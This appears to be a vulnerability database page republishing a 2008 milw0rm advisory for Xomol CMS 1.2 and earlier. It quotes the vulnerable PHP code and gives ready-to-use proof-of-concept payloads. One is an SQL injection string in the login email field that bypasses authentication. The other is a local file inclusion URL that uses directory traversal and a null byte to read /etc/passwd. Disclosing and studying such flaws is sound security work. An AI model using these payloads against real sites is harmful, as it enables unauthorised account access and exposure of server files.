Lucene search
K

Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Xomol CMS v1 Login Bypass & LFI Vulnerabilitie

Code

                                                                     \#&#39;#/
                     (-.-)
   -------------oOO---(_)---OOo------------
   |    Xomol CMS v1 Login Bypass & LFI   |
   |             coded by DNX             |
   ----------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.xomol.net
[!] Detected...: 12.05.2008
[!] Reported...: 13.05.2008 (didn&#39;t work: host mail.xomol.net said: 554 5.7.1 - Relay access denied)
[!] Response...: xx.xx.2008

[!] Background.: Xomol CMS is a content management system based on PHP and MySQL

[!] Bug Bypass.: $_POST[&#39;email&#39;] and $_POST[&#39;password&#39;] in index.php near line 59

                 58: if(!empty($_POST[&#39;email&#39;])&&!empty($_POST[&#39;password&#39;])){
                 59:      $sql=&#39;SELECT user_id FROM users WHERE user_email=&#34;&#39;.$_POST[&#39;email&#39;].&#39;&#34;  AND  user_password=&#34;&#39;.md5($_POST[&#39;password&#39;]).&#39;&#34; AND user_status=1&#39;;
                 60:      $result = sql_query($sql, $dbi);

[!] Bug LFI....: $op in index.php near line 272

                 234: switch($op){

                 270:     default:
                 271:     if (file_exists(&#39;modules/&#39;.$op.&#39;/index.php&#39;)) {
                 272:         include(&#39;modules/&#39;.$op.&#39;/index.php&#39;);

[!] PoC Bypass.: Login with email: &#34; OR user_group=1/*&#34;&#34; and password: not empty
                 (works only with magic_quotes_gpc = off)

[!] PoC LFI....: http://127.0.0.1/xomol/index.php?op=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-05-25]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25